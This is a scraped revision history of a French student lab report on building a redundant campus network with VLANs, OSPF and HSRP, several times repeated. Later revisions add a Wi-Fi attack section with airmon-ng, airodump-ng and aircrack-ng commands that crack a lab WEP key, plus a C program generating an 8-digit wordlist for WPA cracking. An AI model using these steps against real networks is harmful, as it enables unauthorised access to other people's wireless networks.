7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
<br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53191TP sysres IMA2a5 2020/2021 G62020-11-04T16:35:39Z<p>Tvitteco : /* crackage Wpa */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53190TP sysres IMA2a5 2020/2021 G62020-11-04T16:35:06Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53172TP sysres IMA2a5 2020/2021 G62020-11-04T14:42:23Z<p>Tvitteco : /* crackage WEP */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53171TP sysres IMA2a5 2020/2021 G62020-11-04T14:41:32Z<p>Tvitteco : /* crackage WEP */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
<br />
<br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
<br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53169TP sysres IMA2a5 2020/2021 G62020-11-04T14:37:21Z<p>Tvitteco : /* crackage WEP */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
root@zabeth07:~# airmon-ng<br />
<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53167TP sysres IMA2a5 2020/2021 G62020-11-04T14:37:07Z<p>Tvitteco : /* crackage WEP */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
root@zabeth07:~# airmon-ng<br />
<br />
PHY Interface Driver Chipset<br />
<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53166TP sysres IMA2a5 2020/2021 G62020-11-04T14:36:12Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52544TP sysres IMA2a5 2020/2021 G62020-10-02T16:50:47Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
=test=<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=52543TP sysres IMA2a5 2020/2021 G62020-10-02T16:50:25Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
__TOC__<br />
<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
